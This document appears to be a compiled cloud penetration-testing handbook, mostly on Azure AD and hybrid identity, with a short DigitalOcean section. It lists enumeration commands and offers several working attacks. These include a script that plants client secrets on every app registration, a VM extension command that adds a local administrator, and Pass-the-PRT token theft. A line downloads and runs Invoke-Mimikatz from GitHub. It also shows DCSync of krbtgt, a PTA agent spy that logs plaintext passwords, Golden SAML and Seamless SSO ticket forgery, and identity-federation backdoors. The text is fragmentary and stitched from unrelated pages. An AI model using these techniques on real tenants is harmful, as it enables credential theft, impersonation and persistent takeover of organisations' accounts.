Get-AzureADUser -All $true
Get-AzureADUser -All $true | select UserPrincipalName
# Get info of 1 user
Get-AzureADUser -ObjectId [email protected] | fl
# Search "admin" users
Get-AzureADUser -SearchString "admin" #Search admin at the
beginning of DisplayName or userPrincipalName
Get-AzureADUser -All $true |?{$_.Displayname -match "admin"}
#Search "admin" word in DisplayName
# Get all attributes of a user
Get-AzureADUser -ObjectId [email protected]|%
{$_.PSObject.Properties.Name}
# Search attributes containing the word "password"
Get-AzureADUser -All $true |%{$Properties =
$_;$Properties.PSObject.Properties.Name | % {if ($Properties.$_
-match 'password') {"$($Properties.UserPrincipalName) - $_ -
$($Properties.$_)"}}}
# All users from AzureAD
Get-AzureADUser -All $true | ?{$_.OnPremisesSecurityIdentifier
-eq $null}
# All users synced from on-prem
Get-AzureADUser -All $true | ?{$_.OnPremisesSecurityIdentifier
-ne $null}
# Objects created by a/any user
Get-AzureADUser [-ObjectId <email>] | Get-
AzureADUserCreatedObject
# Devices owned by a user
Get-AzureADUserOwnedDevice -ObjectId [email protected]
# Objects owned by a specific user
Get-AzureADUserOwnedObject -ObjectId [email protected]
# Get groups & roles where the user is a member
Get-AzureADUserMembership -ObjectId '[email protected]'
# Get devices owned by a user
Get-AzureADUserOwnedDevice -ObjectId [email protected]
# Get devices registered by a user
Get-AzureADUserRegisteredDevice -ObjectId
[email protected]
# Apps where a user has a role (role not shown)
Get-AzureADUser -ObjectId [email protected] |
Get-AzureADUserAppRoleAssignment | fl *
# Get Administrative Units of a user
$userObj = Get-AzureADUser -Filter "UserPrincipalName eq
'[email protected]'"
Get-AzureADMSAdministrativeUnit | where { Get-
AzureADMSAdministrativeUnitMember -Id $_.Id | where { $_.Id -eq
$userObj.ObjectId } }
Az PowerShell
# Enumerate users
Get-AzADUser
# Get details of a user
Get-AzADUser -UserPrincipalName [email protected]
# Search user by string
Get-AzADUser -SearchString "admin" #Search at the beginning of
DisplayName
Get-AzADUser | ?{$_.Displayname -match "admin"}
# Get roles assigned to a user
Get-AzRoleAssignment -SignInName [email protected]
Groups
az cli
# Enumerate groups
az ad group list
az ad group list --query "[].[displayName]" -o table
# Get info of 1 group
az ad group show --group <group>
# Get "admin" groups
az ad group list --query "[].displayName" | findstr /i "admin"
az ad group list --query "[?
contains(displayName,'admin')].displayName"
# All groups from AzureAD
az ad group list --query "[].
{osi:onPremisesSecurityIdentifier,displayName:displayName,descr
iption:description}[?osi==null]"
az ad group list --query "[?
onPremisesSecurityIdentifier==null].displayName"
# All groups synced from on-prem
az ad group list --query "[].
{osi:onPremisesSecurityIdentifier,displayName:displayName,descr
iption:description}[?osi!=null]"
az ad group list --query "[?
onPremisesSecurityIdentifier!=null].displayName"
# Get members of group
az ad group member list --group <group> --query "
[].userPrincipalName" -o table
# Check if member of group
az ad group member check --group "VM Admins" --member-id <id>
# Get which groups a group is member of
az ad group get-member-groups -g "VM Admins"
# Get Apps where a group has a role (role not shown)
Get-AzureADGroup -ObjectId <id> | Get-
AzureADGroupAppRoleAssignment | fl *
Azure AD
# Enumerate Groups
Get-AzureADGroup -All $true
# Get info of 1 group
Get-AzADGroup -DisplayName <resource_group_name> | fl
# Get "admin" groups
Get-AzureADGroup -SearchString "admin" | fl #Groups starting by
"admin"
Get-AzureADGroup -All $true |?{$_.Displayname -match "admin"}
#Groups with the word "admin"
# Get groups allowing dynamic membership
Get-AzureADMSGroup | ?{$_.GroupTypes -eq 'DynamicMembership'}
# All groups that are from Azure AD
Get-AzureADGroup -All $true | ?{$_.OnPremisesSecurityIdentifier
-eq $null}
# All groups that are synced from on-prem (note that security
groups are not synced)
Get-AzureADGroup -All $true | ?{$_.OnPremisesSecurityIdentifier
-ne $null}
# Get members of a group
Get-AzureADGroupMember -ObjectId <group_id>
# Get roles of group
Get-AzureADMSGroup -SearchString
"Contoso_Helpdesk_Administrators" #Get group id
Get-AzureADMSRoleAssignment -Filter "principalId eq '69584002-
b4d1-4055-9c94-320542efd653'"
# Get Administrative Units of a group
$groupObj = Get-AzureADGroup -Filter "displayname eq
'TestGroup'"
Get-AzureADMSAdministrativeUnit | where { Get-
AzureADMSAdministrativeUnitMember -Id $_.Id | where {$_.Id -eq
$groupObj.ObjectId} }
Az PowerShell
# Get all groups
Get-AzADGroup
# Get details of a group
Get-AzADGroup -ObjectId <id>
# Search group by string
Get-AzADGroup -SearchString "admin" | fl * #Search at the
beginning of DisplayName
Get-AzADGroup |?{$_.Displayname -match "admin"}
# Get members of group
Get-AzADGroupMember -GroupDisplayName <resource_group_name>
# Get roles of group
Get-AzRoleAssignment -ResourceGroupName <resource_group_name>
Service Principals
Note that what PowerShell terminology calls a Service Principal is called an Enterprise Application in the Azure portal (web).
az cli
# Get Service Principals
az ad sp list --all
az ad sp list --all --query "[].[displayName]" -o table
# Get details of one SP
az ad sp show --id 00000000-0000-0000-0000-000000000000
# Search SP by string
az ad sp list --all --query "[?
contains(displayName,'app')].displayName"
# Get owner of service principal
az ad sp owner list --id <id> --query "[].[displayName]" -o
table
# Get service principals owned by the current user
az ad sp list --show-mine
# List apps that have password credentials
az ad sp list --all --query "[?passwordCredentials !=
null].displayName"
# List apps that have key credentials (use of certificate
authentication)
az ad sp list -all --query "[?keyCredentials !=
null].displayName"
Azure AD
# Get Service Principals
Get-AzureADServicePrincipal -All $true
# Get details about a SP
Get-AzureADServicePrincipal -ObjectId <id> | fl *
# Get SP by string name or Id
Get-AzureADServicePrincipal -All $true | ?{$_.DisplayName -
match "app"} | fl
Get-AzureADServicePrincipal -All $true | ?{$_.AppId -match
"103947652-1234-5834-103846517389"}
# Get owner of SP
Get-AzureADServicePrincipal -ObjectId <id> | Get-
AzureADServicePrincipalOwner |fl *
# Get objects owned by a SP
Get-AzureADServicePrincipal -ObjectId <id> | Get-
AzureADServicePrincipalOwnedObject
# Get objects created by a SP
Get-AzureADServicePrincipal -ObjectId <id> | Get-
AzureADServicePrincipalCreatedObject
# Get groups where the SP is a member
Get-AzureADServicePrincipal | Get-
AzureADServicePrincipalMembership
Get-AzureADServicePrincipal -ObjectId <id> | Get-
AzureADServicePrincipalMembership |fl *
Az PowerShell
# Get SPs
Get-AzADServicePrincipal
# Get info of 1 SP
Get-AzADServicePrincipal -ObjectId <id>
# Search SP by string
Get-AzADServicePrincipal | ?{$_.DisplayName -match "app"}
# Get roles of a SP
Get-AzRoleAssignment -ServicePrincipalName <String>
Raw
$Token = 'eyJ0eX..'
$URI = 'https://graph.microsoft.com/v1.0/applications'
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value
.PARAMETER GraphToken
Pass the Graph API Token
.EXAMPLE
PS C:\> Add-AzADAppSecret -GraphToken 'eyJ0eX..'
.LINK
https://docs.microsoft.com/en-us/graph/api/application-
list?view=graph-rest-1.0&tabs=http
https://docs.microsoft.com/en-us/graph/api/application-
addpassword?view=graph-rest-1.0&tabs=http
#>
[CmdletBinding()]
param(
[Parameter(Mandatory=$True)]
[String]
$GraphToken = $null
)
$AppList = $null
$AppPassword = $null
$Params = @{
"URI" =
"https://graph.microsoft.com/v1.0/applications"
"Method" = "GET"
"Headers" = @{
"Content-Type" = "application/json"
"Authorization" = "Bearer $GraphToken"
}
}
try
{
$AppList = Invoke-RestMethod @Params -UseBasicParsing
}
catch
{
}
foreach($App in $AppList.value)
{
$ID = $App.ID
$psobj = New-Object PSObject
$Params = @{
"URI" =
"https://graph.microsoft.com/v1.0/applications/$ID/addPassword"
"Method" = "POST"
"Headers" = @{
"Content-Type" = "application/json"
"Authorization" = "Bearer $GraphToken"
}
}
$Body = @{
"passwordCredential"= @{
"displayName" = "Password"
}
}
try
{
$AppPassword = Invoke-RestMethod @Params -
UseBasicParsing -Body ($Body | ConvertTo-Json)
Add-Member -InputObject $psobj -
NotePropertyName "Object ID" -NotePropertyValue $ID
Add-Member -InputObject $psobj -
NotePropertyName "App ID" -NotePropertyValue $App.appId
Add-Member -InputObject $psobj -
NotePropertyName "App Name" -NotePropertyValue $App.displayName
Add-Member -InputObject $psobj -
NotePropertyName "Key ID" -NotePropertyValue $AppPassword.keyId
Add-Member -InputObject $psobj -
NotePropertyName "Secret" -NotePropertyValue
$AppPassword.secretText
$Details.Add($psobj) | Out-Null
}
catch
{
Write-Output "Failed to add new client secret
to '$($App.displayName)' Application."
}
}
if($Details -ne $null)
{
Write-Output ""
Write-Output "Client secret added to : "
Write-Output $Details | fl *
}
}
else
{
Write-Output "Failed to Enumerate the Applications."
}
}
Roles
az cli
# Get roles
az role definition list
# Get assigned roles
az role assignment list --all --query "[].roleDefinitionName"
# Get info of 1 role
az role definition list --name "AzureML Registry User"
# Get only custom roles
az role definition list --custom-role-only
# Get only roles assigned to the resource group indicated
az role definition list --resource-group <resource_group>
# Get only roles assigned to the indicated scope
az role definition list --scope <scope>
# Get all the principals a role is assigned to
az role assignment list --all --query "[].
{principalName:principalName,principalType:principalType,resour
ceGroup:resourceGroup,roleDefinitionName:roleDefinitionName}[?
roleDefinitionName=='<ROLE_NAME>']"
Azure AD
# Get all available role templates
Get-AzureADDirectoryroleTemplate
# Get enabled roles (Assigned roles)
Get-AzureADDirectoryRole
Get-AzureADDirectoryRole -ObjectId <roleID> #Get info about the
role
# Get custom roles - use AzureAdPreview
Get-AzureADMSRoleDefinition | ?{$_.IsBuiltin -eq $False} |
select DisplayName
# Users assigned a role (Global Administrator)
Get-AzureADDirectoryRole -Filter "DisplayName eq 'Global
Administrator'" | Get-AzureADDirectoryRoleMember
Get-AzureADDirectoryRole -ObjectId <id> | fl
# Roles of the Administrative Unit (who has permissions over
the administrative unit and its members)
Get-AzureADMSScopedRoleMembership -Id <id> | fl *
Az PowerShell
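The Az PowerShell equivalents are not listed above; a minimal sketch of the usual cmdlets:
# Role definitions (built-in and custom)
Get-AzRoleDefinition
Get-AzRoleDefinition | ?{$_.IsCustom -eq $true}
# Role assignments in the current subscription / for a principal
Get-AzRoleAssignment
Get-AzRoleAssignment -SignInName [email protected]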
Raw
# Get permissions over a resource using ARM directly
$Token = (Get-AzAccessToken).Token
$URI = 'https://management.azure.com/subscriptions/b413826f-
108d-4049-8c11-
d52d5d388768/resourceGroups/Research/providers/Microsoft.Comput
e/virtualMachines/infradminsrv/providers/Microsoft.Authorizatio
n/permissions?api-version=2015-07-01'
$RequestParams = @{
Method = 'GET'
Uri = $URI
Headers = @{
'Authorization' = "Bearer $Token"
}
}
(Invoke-RestMethod @RequestParams).value
Devices
az cli
Azure AD
# Enumerate Devices
Get-AzureADDevice -All $true | fl *
# List all the active devices (and not the stale devices)
Get-AzureADDevice -All $true | ?
{$_.ApproximateLastLogonTimeStamp -ne $null}
# Get owners of all devices
Get-AzureADDevice -All $true | Get-AzureADDeviceRegisteredOwner
Get-AzureADDevice -All $true | %{if($user=Get-
AzureADDeviceRegisteredOwner -ObjectId $_.ObjectID)
{$_;$user.UserPrincipalName;"`n"}}
# Registered users of all the devices
Get-AzureADDevice -All $true | Get-AzureADDeviceRegisteredUser
Get-AzureADDevice -All $true | %{if($user=Get-
AzureADDeviceRegisteredUser -ObjectId $_.ObjectID)
{$_;$user.UserPrincipalName;"`n"}}
# Get devices managed using Intune
Get-AzureADDevice -All $true | ?{$_.IsCompliant -eq "True"}
# Get devices owned by a user
Get-AzureADUserOwnedDevice -ObjectId [email protected]
# Get Administrative Units of a device
Get-AzureADMSAdministrativeUnit | where { Get-
AzureADMSAdministrativeUnitMember -ObjectId $_.ObjectId | where
{$_.ObjectId -eq $deviceObjId} }
Apps
Apps are App Registrations in the portal (not Enterprise Applications).\
But each App Registration will create an Enterprise Application (Service
Principal) with the same name.\ Moreover, if the App is a multi-tenant
App, another Enterprise App (Service Principal) will be created in that
tenant with the same name.
az cli
# List Apps
az ad app list
az ad app list --query "[].[displayName]" -o table
# Get info of 1 App
az ad app show --id 00000000-0000-0000-0000-000000000000
# Search App by string
az ad app list --query "[?
contains(displayName,'app')].displayName"
# Get the owner of an application
az ad app owner list --id <id> --query "[].[displayName]" -o
table
# List all the apps with an application password
az ad app list --query "[?passwordCredentials !=
null].displayName"
# List apps that have key credentials (use of certificate
authentication)
az ad app list --query "[?keyCredentials != null].displayName"
Azure AD
# List all registered applications
Get-AzureADApplication -All $true
# Get details of an application
Get-AzureADApplication -ObjectId <id> | fl *
# List all the apps with an application password
Get-AzureADApplication -All $true | %{if(Get-
AzureADApplicationPasswordCredential -ObjectID $_.ObjectID)
{$_}}
# Get owner of an application
Get-AzureADApplication -ObjectId <id> | Get-
AzureADApplicationOwner |fl *
Az PowerShell
# Get Apps
Get-AzADApplication
# Get details of one App
Get-AzADApplication -ObjectId <id>
# Get App searching by string
Get-AzADApplication | ?{$_.DisplayName -match "app"}
# Get Apps with password
Get-AzADAppCredential
A secret string that the application uses to prove its identity when requesting a token is the application password. So, if you find this password you can access as the service principal inside the tenant. Note that this password is only visible when generated (you could change it but you cannot retrieve it again). The owner of the application can add a password to it (so he could impersonate it). Logins as these service principals are not marked as risky and they won't have MFA.
Administrative Units
Administrative units are used for better management of users. You can assign a role scoped to an administrative unit, so the role holder gets those permissions only over the members of that unit.
az cli
AzureAD
# Get Administrative Units
Get-AzureADMSAdministrativeUnit
Get-AzureADMSAdministrativeUnit -Id <id>
# Get ID of admin unit by string
$adminUnitObj = Get-AzureADMSAdministrativeUnit -Filter
"displayname eq 'Test administrative unit 2'"
# List the users, groups, and devices affected by the
administrative unit
Get-AzureADMSAdministrativeUnitMember -Id <id>
# Get the roles users have over the members of the AU
Get-AzureADMSScopedRoleMembership -Id <id> | fl #Get role ID
and role members
References
https://learn.microsoft.com/en-us/azure/active-
directory/roles/administrative-units
Each app runs inside a sandbox but isolation depends upon App Service
plans
Enumeration
Public Exposure
If "Allow Blob public access" is enabled (disabled by default), it's possible
to:
Give public access to read blobs (you need to know the name).
List container blobs and read them.
Connect to Storage
If you find any storage you can connect to you could use the tool
Microsoft Azure Storage Explorer to do so.
SAS URLs
A shared access signature (SAS) provides secure delegated access to
resources in your storage account. With a SAS, you have granular control
over how a client can access your data. For example:
A user delegation SAS is supported for Azure Blob Storage and Azure
Data Lake Storage Gen2. Stored access policies are not supported for a
user delegation SAS.
To use Azure Active Directory (Azure AD) credentials to secure a SAS for a container or blob, use a user delegation SAS.
Account SAS
An account SAS is secured with one of the storage account keys (there are
2). An account SAS delegates access to resources in one or more of the
storage services. All of the operations available via a service or user
delegation SAS are also available via an account SAS.
Key Vault objects are addressed via URLs of the form: https://{vault-name}.vault.azure.net/{object-type}/{object-name}/{object-version}
In order to access the secrets stored in the vault, 2 permission models can be used:
Access Management
Access to a vault is controlled through two planes:
# List vaults
Get-AzKeyVault
# Get secrets names from the vault
Get-AzKeyVaultSecret -VaultName <vault_name>
# Get secret values
Get-AzKeyVaultSecret -VaultName <vault_name> -Name
<secret_name> –AsPlainText
Therefore, if you have access to write it, you can execute arbitrary code:
# Microsoft.Compute/virtualMachines/extensions/write
Set-AzVMExtension -ResourceGroupName "Research" -ExtensionName "ExecCmd" -VMName "infradminsrv" -Location "Germany West Central" -Publisher Microsoft.Compute -ExtensionType CustomScriptExtension -TypeHandlerVersion 1.8 -SettingString '{"commandToExecute":"powershell net users new_user Welcome2022. /add /Y; net localgroup administrators new_user /add"}'
DesiredConfigurationState
DesiredConfigurationState (DSC) is similar to Ansible, but is a tool
within PowerShell that allows a host to be setup through code. DSC has its
own extension in Azure which allows the upload of configuration files.
DSC configuration files are quite picky when it comes to syntax; however, the DSC extension is very gullible and will blindly execute anything as long as it follows a certain format.
This can be done via the Az PowerShell function Publish-AzVMDscConfiguration.
VM Application Definitions
The VM Applications resource is a way to deploy versioned applications
repeatably to an Azure VM. For example, if you create a program and
deploy it to all Azure VMs as version 1.0, once you update the program to
1.1, you can use the same VM Application to create another definition
and push the update out to any VM. Being able to push out an application
to a VM means it’s another avenue for code execution. This method’s
drawback is that setting up the Application Definition requires a few steps,
but can be accomplished using the New-AzGalleryApplication and New-AzGalleryApplicationVersion cmdlets.
Since it’s an extension that ultimately does the execution, a copy of the
application is located at
C:\Packages\Plugins\Microsoft.CPlat.Core.VMApplicationManagerWindo
ws\1.0.4\Status\ .
Azure AD joined
Workplace joined
https://pbs.twimg.com/media/EQZv7UHXsAArdhn?
format=jpg&name=large
Hybrid joined
https://pbs.twimg.com/media/EQZv77jXkAAC4LK?
format=jpg&name=large
Azure AD Connect
Another way to pivot from cloud to On-Prem is abusing Intune
https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-
forensic-methodology/specific-software-file-type-tricks/browser-artifacts?
q=browse#google-chrome
Attack
The challenging part is that those cookies are encrypted for the user via
the Microsoft Data Protection API (DPAPI). This is encrypted using
cryptographic keys tied to the user the cookies belong to. You can find more
information about this in:
https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-
escalation/dpapi-extracting-passwords
Then, when the browser tries to access resources on the cloud, a PRT
cookie is used to access them.
For more information about how this works read the documentation or this
page.
Dsregcmd.exe /status
In the SSO State section, you should see the AzureAdPrt set to YES.
In the same output you can also see if the device is joined to Azure (in the
field AzureAdJoined ):
Pass-the-PRT
Steps
1. Extract the PRT from LSASS and save this for later.
2. Extract the Session Key. If you remember this is issued and then re-
encrypted by the local device, so we need to decrypt this using a
DPAPI masterkey. For more info about DPAPI check this
HackTricks link or the Pass-the-cookie attack.
3. Using the decrypted Session Key, we will obtain the derived key for
the PRT and the context. This is needed to create our PRT cookie.
The derived key is what is used to sign the JWT for the cookie. Dirk-
jan did a great job explaining this process here.
Now we have everything we need to sign our own PRT Cookies and the rest
of these steps can be done from any other system.
We will use the PRT, derived key, and context to create a new PRT
Cookie.
Import the cookie into your browser session (we’ll use Chrome)
That’s it! You should now be authenticated as that user without having
to know their password, or handle any MFA prompts.
Attack - Roadtoken
For more info about this way check this post. To generate a valid PRT
cookie the first thing you need is a nonce. You can get this with:
$TenantId = "19a03645-a17b-129e-a8eb-109ea7644bed"
$URL =
"https://login.microsoftonline.com/$TenantId/oauth2/token"
$Params = @{
"URI" = $URL
"Method" = "POST"
}
$Body = @{
"grant_type" = "srv_challenge"
}
$Result = Invoke-RestMethod @Params -UseBasicParsing -Body
$Body
$Result.Nonce
AwABAAAAAAACAOz_BAD0_8vU8dH9Bb0ciqF_haudN2OkDdyluIE2zHStmEQdUVb
iSUaQi_EdsWfi1 9-EKrlyme4TaOHIBG24v-FBV96nHNMgAA
Or using roadrecon:
Then you can use roadtoken to get a new PRT (run in the tool from a
process of the user to attack):
.\ROADtoken.exe <nonce>
As oneliner:
Then you can use the generated cookie to generate tokens to login using
Azure AD Graph or Microsoft Graph:
# Get an access token for AAD Graph API and save to cache
Get-AADIntAccessTokenForAADGraph -PRTToken $prtToken
Attack - Mimikatz
This won't work post August 2021 fixes as only the user can get his PRT (a
local admin cannot access other users PRTs)
mimikatz.exe
Privilege::debug
Sekurlsa::cloudap
# Or in powershell
iex (New-Object
Net.Webclient).downloadstring("https://raw.githubusercontent.co
m/samratashok/nishang/master/Gather/Invoke-Mimikatz.ps1")
Invoke-Mimikatz -Command '"privilege::debug"
"sekurlsa::cloudap"'
Copy the part labeled Prt and save it. Extract also the session key or "ProofOfPosessionKey", which you can see highlighted below. This is encrypted and we will need to use our DPAPI masterkeys to decrypt it.
If you don’t see any PRT data it could be that you don’t have any PRTs
because your device isn’t Azure AD joined or it could be you are running
an old version of Windows 10.
Token::elevate
Dpapi::cloudapkd /keyvalue:[PASTE ProofOfPosessionKey HERE]
/unprotect
Now you want to copy both the Context value:
Finally you can use all this info to generate PRT cookies:
Name: x-ms-RefreshTokenCredential
Value: [Paste your output from above]
HttpOnly: Set to True (checked)
The rest should be the defaults. Make sure you can refresh the page and the
cookie doesn’t disappear, if it does, you may have made a mistake and have
to go through the process again. If it doesn’t, you should be good.
References
This post was mostly extracted from
https://stealthbits.com/blog/lateral-movement-to-the-cloud-pass-the-
prt/
In this scenario and after grabbing all the info needed for a Pass the PRT
attack:
Username
Tenant ID
PRT
Security context
Derived Key
It's possible to request P2P certificate for the user with the tool
PrtToCert:
The certificates will last the same as the PRT. To use the certificate you can
use the python tool AzureADJoinedMachinePTC that will authenticate
to the remote machine, run PSEXEC and open a CMD on the victim
machine. This will allow us to use Mimikatz again to get the PRT of
another user.
For each method, at least the user synchronization is done and an account
with the name MSOL_<installationidentifier> is created on the on-
prem AD.
Get-ADSyncConnector
PHS
phs-password-hash-sync.md
PTA
pta-pass-through-authentication.md
Seamless SSO
seamless-sso.md
Federation
federation.md
You can federate your on-premises environment with Azure AD and use
this federation for authentication and authorization. This sign-in method
ensures that all user authentication occurs on-premises. This method
allows administrators to implement more rigorous levels of access control.
Federation with AD FS and PingFederate is available.
Basically, in Federation, all authentication occurs in the on-prem environment and the user experiences SSO across all the trusted environments. Therefore, users can access cloud applications by using their on-prem credentials.
User or Client
Identity Provider (IdP):
Service Provider (SP)
1. First the user tries to access an application (also known as the SP i.e.
Service Provider), that might be an AWS console, vSphere web client,
etc. Depending on the implementation, the client may go directly to the
IdP first, and skip the first step in this diagram.
2. The application then detects the IdP (i.e. Identity Provider, could be
AD FS, Okta, etc.) to authenticate the user, generates a SAML
AuthnRequest and redirects the client to the IdP.
3. The IdP authenticates the user, creates a SAMLResponse and posts
it to the SP via the user.
4. SP checks the SAMLResponse and logs the user in. The SP must
have a trust relationship with the IdP. The user can now use the
service.
https://book.hacktricks.xyz/pentesting-web/saml-attacks
Pivoting
AD FS is a claims-based identity model.
"..claimsaresimplystatements(forexample,name,identity,group), made
about users, that are used primarily for authorizing access to claims-
based applications located anywhere on the Internet."
Claims for a user are written inside the SAML tokens and are then
signed to provide confidentiality by the IdP.
A user is identified by ImmutableID. It is globally unique and stored in
Azure AD.
The ImmutableID is stored on-prem as ms-DS-ConsistencyGuid for the user and/or can be derived from the GUID of the user.
More info in https://learn.microsoft.com/en-us/windows-
server/identity/ad-fs/technical-reference/the-role-of-claims
Golden SAML
From the previous schema the most interesting part is the third one, where the IdP generates a SAMLResponse authorising the user to sign in.
Depending on the specific IdP implementation, the response may be either
signed or encrypted by the private key of the IdP. This way, the SP can
verify that the SAMLResponse was indeed created by the trusted IdP.
Similar to a golden ticket attack, with the key that signs the object which
holds the user’s identity and permissions (KRBTGT for golden ticket and
token-signing private key for golden SAML), we can then forge such an
"authentication object" (TGT or SAMLResponse) and impersonate
any user to gain unauthorized access to the SP.
For the private key you’ll need access to the AD FS account, and from its
personal store you’ll need to export the private key (export can be done
with tools like mimikatz). For the other requirements you can import the
powershell snapin Microsoft.Adfs.Powershell and use it as follows (you
have to be running as the ADFS user):
# IdP Name
(Get-ADFSProperties).Identifier.AbsoluteUri
# Role Name
(Get-ADFSRelyingPartyTrust).IssuanceTransformRule
# Apply session for AWS cli
python shimit.py -idp http://adfs.lab.local/adfs/services/trust -pk key_file -c cert_file -u domainadmin -n [email protected] -r ADFS-admin -r ADFS-monitor -id 123456789012
# idp - Identity Provider URL e.g.
http://server.domain.com/adfs/services/trust
# pk - Private key file full path (pem format)
# c - Certificate file full path (pem format)
# u - User and domain name e.g. domain\username (use \ or
quotes in *nix)
# n - Session name in AWS
# r - Desired roles in AWS. Supports Multiple roles, the first
one specified will be assumed.
# id - AWS account id e.g. 123456789012
All users and a hash of the password hashes are synchronized from the on-prem to Azure AD. However, clear-text passwords or the original hashes aren't sent to Azure AD. Moreover, built-in security groups (like domain admins...) are not synced to Azure AD.
PHS is required for features like Identity Protection and AAD Domain
Services.
Pivoting
When PHS is configured some privileged accounts are automatically
created:
# ActiveDirectory module
Get-ADUser -Filter "samAccountName -like 'MSOL_*'" -Properties * | select SamAccountName,Description | fl
#Azure AD module
Get-AzureADUser -All $true | ?{$_.userPrincipalName -match
"Sync_"}
AzureAD -> On-prem
# Using the creds of MSOL_* account, you can run DCSync against
the on-prem AD
runas /netonly /user:defeng.corp\MSOL_123123123123 cmd
Invoke-Mimikatz -Command '"lsadump::dcsync /user:domain\krbtgt
/domain:domain.local /dc:dc.domain.local"'
It's also possible to modify the passwords of only cloud users (even if
that's unexpected)
# To reset the password of cloud only user, we need their
CloudAnchor that can be calculated from their cloud objectID
# The CloudAnchor is of the format USER_ObjectID.
Get-AADIntUsers | ?{$_.DirSyncEnabled -ne "True"} | select
UserPrincipalName,ObjectID
# Reset password
Set-AADIntUserPassword -CloudAnchor "User_19385ed9-sb37-c398-b362-12c387b36e37" -Password "JustAPass12343.%" -Verbose
Seamless SSO
It's possible to use Seamless SSO with PTA, which is vulnerable to other
abuses. Check it in:
seamless-sso.md
References
https://learn.microsoft.com/en-us/azure/active-directory/hybrid/whatis-
phs
https://aadinternals.com/post/on-prem_admin/
Authentication flow
1. To login the user is redirected to Azure AD, where he sends the
username and password
2. The credentials are encrypted and set in a queue in Azure AD
3. The on-prem authentication agent gathers the credentials from the
queue and decrypts them. This agent is called "Pass-through
authentication agent" or PTA agent.
4. The agent validates the creds against the on-prem AD and sends the
response back to Azure AD which, if the response is positive,
completes the login of the user.
If an attacker compromises the PTA agent he can see all the credentials from the queue (in clear-text). He can also validate any credentials against Azure AD (an attack similar to Skeleton Key).
Install-AADIntPTASpy
It's also possible to see the clear-text passwords sent to PTA agent using
the following cmdlet on the machine where the previous backdoor was
installed:
Get-AADIntPTASpyLog -DecodePasswords
Seamless SSO
It's possible to use Seamless SSO with PTA, which is vulnerable to other
abuses. Check it in:
seamless-sso.md
References
https://learn.microsoft.com/en-us/azure/active-directory/hybrid/how-
to-connect-pta
https://aadinternals.com/post/on-prem_admin/#pass-through-
authentication
Basically, Azure AD Seamless SSO signs users in when they are on an on-prem domain-joined PC.
It's supported by both PHS (Password Hash Sync) and PTA (Pass-
through Authentication).
Desktop SSO is using Kerberos for authentication. When configured,
Azure AD Connect creates a computer account called
AZUREADSSOACC in on-prem AD. The password of the
AZUREADSSOACC account is sent as plain-text to Azure AD during the
configuration.
The Kerberos tickets are encrypted using the NTHash (MD4) of the
password and Azure AD is using the sent password to decrypt the tickets.
azuread-sso.com
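If you manage to obtain the NTHash of the AZUREADSSOACC account (e.g. via DCSync), a hedged sketch of abusing it with AADInternals to impersonate a synced user (the SID and hash are placeholders):
# Forge a Kerberos ticket for the victim user using the AZUREADSSOACC hash
$kerberos = New-AADIntKerberosTicket -SidString "S-1-5-21-854168551-...-1104" -Hash "<AZUREADSSOACC_NTHash>"
# Exchange it for a cloud access token (e.g. Azure AD Graph)
Get-AADIntAccessTokenForAADGraph -KerberosTicket $kerberos -Domain company.com -SaveToCache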
Moreover, you could also accept that application with your user as a way to
maintain access over it.
$passwd = ConvertTo-SecureString
"J~Q~QMt_qe4uDzg53MDD_jrj_Q3P.changed" -AsPlainText -Force
$creds = New-Object
System.Management.Automation.PSCredential("311bf843-cc8b-459c-
be24-6ed908458623", $passwd)
Connect-AzAccount -ServicePrincipal -Credential $creds -Tenant e12984235-1035-452e-bd32-ab4d72639a
New-AADIntADFSSelfSignedCertificates
# Using AADInternals
ConvertTo-AADIntBackdoor -DomainName cyberranges.io
Dynamic groups can have Azure RBAC roles assigned to them, but it's
not possible to add AzureAD roles to dynamic groups.
Example
Rule example: (user.otherMails -any (_ -contains "tester"))
Rule description: Any Guest user whose secondary email contains the string 'tester' will be added to the group
# Login
$password = ConvertTo-SecureString 'password' -
AsPlainText -Force
$creds = New-Object
System.Management.Automation.PSCredential('externaltester@
somedomain.onmicrosoft.com', $Password)
Connect-AzureAD -Credential $creds -TenantId
<tenant_id_of_attacked_domain>
Concepts such as hierarchy, access and other basic concepts are explained
in:
do-basic-information.md
Basic Enumeration
SSRF
https://book.hacktricks.xyz/pentesting-web/ssrf-server-side-request-
forgery/cloud-ssrf
Projects
To get a list of the projects and resources running on each of them from the
CLI check:
do-projects.md
Whoami
Another key difference between the two platforms is the pricing structure. DigitalOcean's pricing is generally more straightforward and easier to understand than AWS's, with a range of pricing plans based on the number of droplets and other resources used. AWS, on the other hand, has a more complex pricing structure based on a variety of factors, including the type and amount of resources used. This can make it more difficult to predict costs when using AWS.
Hierarchy
User
A user is what you expect, a user. He can create Teams and be a member
of different teams.
Team
A team is a group of users. When a user creates a team he gets the owner role on that team and initially sets up the billing info. Other users can then be invited to the team.
Inside the team there might be several projects. A project is just a set of services running together. It can be used to separate different infra stages, like prod, staging, dev...
Project
As explained, a project is just a container for all the services (droplets,
spaces, databases, kubernetes...) running together inside of it.\ A Digital
Ocean project is very similar to a GCP project without IAM.
Permissions
Team
Basically all members of a team have access to the DO resources in all the
projects created within the team (with more or less privileges).
Roles
Each user inside a team can have one of the following three roles inside of it: Owner, Member or Biller.
Owner and member can list the users and check their roles (biller cannot).
Access
Username + password (MFA)
As in most platforms, in order to access the GUI you can use a valid username and password to access the cloud resources. Once logged in you can see all the teams you are part of in https://cloud.digitalocean.com/account/profile and all your activity in https://cloud.digitalocean.com/account/activity.
MFA can be enabled for a user and enforced for all the users in a team in order to access the team.
API keys
In order to use the API, users can generate API keys. These always come with Read permissions, but Write permissions are optional.\ The API keys look like this:
dop_v1_1946a92309d6240274519275875bb3cb03c1695f60d47eaa1532916502361836
They are composed of a name, a key id and a secret. An example could be:
Name: key-example
Keyid: DO00ZW4FABSGZHAABGFX
Secret: 2JJ0CcQZ56qeFzAJ5GFUeeR4Dckarsh6EQSLm87MKlM
OAuth Application
OAuth applications can be granted access over Digital Ocean.
SSH keys
This way, if you create a new droplet, the SSH key will be set on it and you will be able to log in via SSH without a password (note that newly uploaded SSH keys aren't added to already existing droplets for security reasons).
Team logs
The logs of a team can be found in
https://cloud.digitalocean.com/account/security
References
https://docs.digitalocean.com/products/teams/how-to/manage-
membership/
Apps
Container Registry
Databases
Droplets
Functions
Images
Kubernetes (DOKS)
Networking
Projects
Spaces
Volumes
